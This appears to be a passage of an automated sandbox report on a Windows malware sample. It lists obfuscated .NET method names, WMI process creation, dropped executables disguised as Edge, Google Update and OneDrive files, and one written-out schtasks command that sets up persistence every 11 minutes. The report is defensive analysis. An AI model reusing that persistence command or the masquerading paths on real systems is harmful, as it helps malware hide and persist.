                              Source: 0JLWNg4Sz1.exe, KAxV1cLyU3xgnSNaKuN.csHigh entropy of concatenated method names: 'P8ibQNOjVVl', 'aTYLGA033S', 'catbQoeQP2T', 'XqgUK0b9LQw8hs5Tv982', 'JaLguub9Jkf1TdvkqhSe', 'S2E2W5b9W7E0GhotinQa', 'wJcUupb9SjOHo3du7xjw', 'CqrOnfb9U3yuW6WmYP6N', 'dWu3t6b9CXOKs6n64NhQ', 'SVkKYbb9nBwZl3YMav5Q'
                              Source: 0JLWNg4Sz1.exe, RqEvCqRnA6B1x1Fg18M.csHigh entropy of concatenated method names: 'VuM4HObMfKXYawIseyxq', 'A2rlJDbM7oEgFFIWWYU8', 'P9eqaTbMqZFbTghGwafA', 'Cqi8dJbMMk7TkvZ0Ixwe', 'SbyivyPaZB', 'EDHgFqbM9yrAvq72qDqO', 'm9HRjEbMZVsedoDeexwt', 'hQEn8hbMhck4OZ8bG4Mh', 'cvDObC6xjR', 'tTjBaIbMlPXxxfQLXFAk'
                              Source: 0JLWNg4Sz1.exe, omprTgJIEboMH3ZuGKb.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NZtJ42alAh', 'vmethod_0', 'vJtJQjUSnw', 'kG3bQJKA3IC', 'q1cjEGb9l9W0uHVsDqeX', 'yE8Z07b99VG1VqqU9EPP', 'TWqFDqb9jN4ip3eL7ytx'
                              Source: 0JLWNg4Sz1.exe, CSPVqRLrUaeKAxBnaO3.csHigh entropy of concatenated method names: 'N2N', 'aHhbQOERq0N', 'VFELhdgNFy', 'k23bQ1AZtvv', 'na8V0vb98huPSGdeodOf', 'IybwnNb94dqjOYO6RAjg', 'iKEm8Zb9ATDkfMeG0kVS', 'rD62aYb9IZ2jXM3184B6', 'PhiFxGb9QtH8deqgrwms', 'OAK1N2b9RjOsYyW7LV0e'
                              Source: 0JLWNg4Sz1.exe, JMxt9k5p32I4KCJCsdm.csHigh entropy of concatenated method names: 'AgA5cf9HxC', 'Pui57H0iHM', 'IH85qPwkuN', 'sHy5fpmInH', 'Dispose', 'xqscH3bFsLhiInO7HSIu', 'U3D7nobF3IB8hkoPuRqP', 'sSqQygbFYlsh4FpfW27k', 'Oocu5kbFinRBQCywvkDm', 'LsRYcEbFOjE2lgvd1NLt'
                              Source: 0JLWNg4Sz1.exe, euDXq5lAyGT9uTRTSc.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'tWrXJe7SP'
                              Source: 0JLWNg4Sz1.exe, QMhsB8bWQINTVsc31X9.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'en4b4z5KTR3', 'PdlbAbXx1ob', 'LcxrBybwCnYSwd5sYVGA', 'REjpcAbwnyUCWRbSplHO'
                              Source: 0JLWNg4Sz1.exe, rb71eNw9GHN98tUkc5T.csHigh entropy of concatenated method names: 'FTcwaxXNdg', 'oI4wzsswMn', 'sYdwlSrkvh', 'kLlwHESJt5', 'AbvwXtXZru', 's9Yw0jC0ZX', 'WUWw2mkmXl', 'gdowyJQ5nB', 'zjuwEwKexo', 'm9RwGVKGVA'
                              Source: 0JLWNg4Sz1.exe, g1lOkGZxrBxCWmoVRYP.csHigh entropy of concatenated method names: 'MSnZaohooQ', 'hrlZvP15WE', 'otKZz159uZ', 'FdKh6N3fS1', 'r2qhbnyZvv', 'qRthm08NRk', 'YO2hPRRlVW', 'ggZhAjrAdR', 'bt1hI3CyZb', 'xYXh8PHeZy'
                              Source: 0JLWNg4Sz1.exe, NldO1wI1ZRNSSGGvm6u.csHigh entropy of concatenated method names: 'PthIwIJLJ8', 'ULbIB3ha3n', 'sZ6IDRYSZC', 'gJAtQwbpZUDyBNN07sNV', 'N91UmIbpMgxRjF5vvylT', 'QtLsMMbprc4OUbYtsNMS', 'SfhInbAHfD', 'lJMItWhp2c', 'Th9Ch7bp74KGauiXEFvC', 'VN9DaJbpqwTeWwZqcmfF'
                              Source: 0JLWNg4Sz1.exe, UDNl7ZJ1t2cRHZPrh9Z.csHigh entropy of concatenated method names: 'DXa8YpbjOuncu01UesLB', 'F19w23bj1IMwTFujDU03', 'Sg8Js2bjsKPY0N7d7KUM', 'nMeeXAbji8LMBU8Y0C5c', 'method_0', 'method_1', 'JcfJoRYe4X', 'TeBJWMfvnd', 'ggcJSpWQ52', 'xaFJLijZC2'
                              Source: 0JLWNg4Sz1.exe, wgUbhRRmoxBiwNGOuoV.csHigh entropy of concatenated method names: 'NMCRAsyWOH', 'qUHRI7ok7V', 'V9KR8qaIyv', 'kppR48MouJ', 'kIIRQpGd7q', 'VirRRuyIsL', 'FrZReynXXD', 'XguR3awwZl', 'UIeRYGkbjj', 'pvfRsBLEUH'
                              Source: 0JLWNg4Sz1.exe, W1MqfXdJMaPI8y9q2Sv.csHigh entropy of concatenated method names: 'caFci0PaYt', 'ctdfKhbEH0BIHn6P6weO', 'oIGLPIbEjJxSmVE7HSml', 'XFL7Q8bElOSpdccYEiyI', 'kPxubGbEXkB57qR1i9CW', 'kt5', 'AHFdCTtBjn', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: 0JLWNg4Sz1.exe, kYSjZaDh6h9BTBOkcKV.csHigh entropy of concatenated method names: 'OY6DjMhrKE', 'u5SDlLZ476', 'bjYDHhX029', 'iAkDXRR7cU', 'a6qD0MlvOU', 'EbTD2Zq7Ji', 'EFHDyCyuQn', 'DVoDEUtfCa', 'BW3DGFsmhL', 'F44DTXxjLZ'
                              Source: 0JLWNg4Sz1.exe, S6TtBBaZoTTKOAkZZlK.csHigh entropy of concatenated method names: 'Vsjb8d3UJCi', 'PA7b8cqSI81', 'cbIb87IJQLm', 'RlLb8qn5v7k', 'NgWb8fMeX6q', 'qcjb8MPp5BL', 'KHeb8rjcHh1', 'jQnvISQ1hN', 'pM4b8Z5Z0QD', 'IH2b8hGIbgN'
                              Source: 0JLWNg4Sz1.exe, M9vuuWx6GBvjLeTm4nX.csHigh entropy of concatenated method names: 'HYfxAPK7xC', 'eJtxI0Tq4w', 'q3OHNUbF9MGVC4bu37r4', 'YJRvNfbFZ7shy4aThuwg', 'pqY9e3bFh1iac7KWmqFr', 'JxwYkXbFjEdjmiYfZCCl', 'jsfV46bFl9DU691aE52W', 'mRxZLmbFHm69jh40uZpt', 'si7xmUQSyt', 'wTlufGbFqAXPpPYrDh7c'
                              Source: 0JLWNg4Sz1.exe, jhG8A4QhyucfjXMipUP.csHigh entropy of concatenated method names: 'P9X', 'XimbQYKJlSi', 'imethod_0', 'bdhQjhC2QU', 'yOGXRcb7vThrTt5NgHae', 'aPueChb7zU4SxSSFTCHs', 'Ameqfsbq68Pc4WSavAE5', 'b6kNHrbqb9W3po1BGRgK', 'pcC78xbqmrGWcjR8Bk1S'
                              Source: 0JLWNg4Sz1.exe, xl4l8n4bGNxEn79Hq5X.csHigh entropy of concatenated method names: 'iGQ4PVxUDq', 'ccY4AmvxZX', 'qbo4IdENRX', 'pVixutbcRHYi5MJ3ZLVi', 'phZP45bc4dWjZyRdmI9C', 'zwIpxHbcQRwBc2UDg2rO', 'VT66QFbceVHRelrVG3wy', 'IXZVmGbc31io9O9BGrRd', 'xh8CDSbcYEuXt4VmKuyF', 'DNGlQcbcs8WGfXZBrZbF'
                              Source: 0JLWNg4Sz1.exe, LoGmZY4pgRVQxt1yNTZ.csHigh entropy of concatenated method names: 'eoG4cxKTI8', 'iAh47j9tn7', 'i64Qinbc20xdggfYDg5f', 'D0YVL0bcXy14x2ThpQQE', 'alI5a9bc0Q2J3krx67Ft', 'PI0no1bcyodUYBE4oyvr', 'jD8N1YbcEr5WJ6Fn7kOn', 'WCjDjZbcG22taZlH3xFs', 'hHWru1bcTCCDmk07DeXQ', 'dnHgXybcKHClnG50tJQT'
                              Source: 0JLWNg4Sz1.exe, twGaCcfxExm4QVpv4X3.csHigh entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
                              Source: 0JLWNg4Sz1.exe, dZF6KOVnHUCFSiJA1fN.csHigh entropy of concatenated method names: 'ydgVVaxVj4', 'ROWVghusDZ', 'ALxVwODZo8', 'NdWVBqpcd1', 'E9AVDcBJt7', 'Jtn2vHbH2dNen3LM9NBi', 'sSMYYxbHXym88ZTAkeDI', 'OXBHpibH0vQGT9BG9RYy', 'ufOf5UbHyAPdQpEg6R0h', 'K17pv5bHExfvUIPGpYFr'
                              Source: 0JLWNg4Sz1.exe, cTsTGcaWXYIhqk3nyC4.csHigh entropy of concatenated method names: 'kmNaDpUZgA', 'pcwauxICB6', 'iEwap69FTG', 'd6SadT1YZH', 'lPDacEiR8U', 'BPqa7SXSd1', 'gYxaqVomLk', 'R3TafdLpFR', 'Q84aMST7LK', 'UfLar02Hdm'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Recovery\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeFile created: C:\Users\user\Desktop\KjTCumlu.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Users\user\Desktop\ALzNWdSZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Recovery\DViaOgnvmAhwCXZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile created: C:\Users\user\Desktop\ALzNWdSZ.logJump to dropped file
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeFile created: C:\Users\user\Desktop\KjTCumlu.logJump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
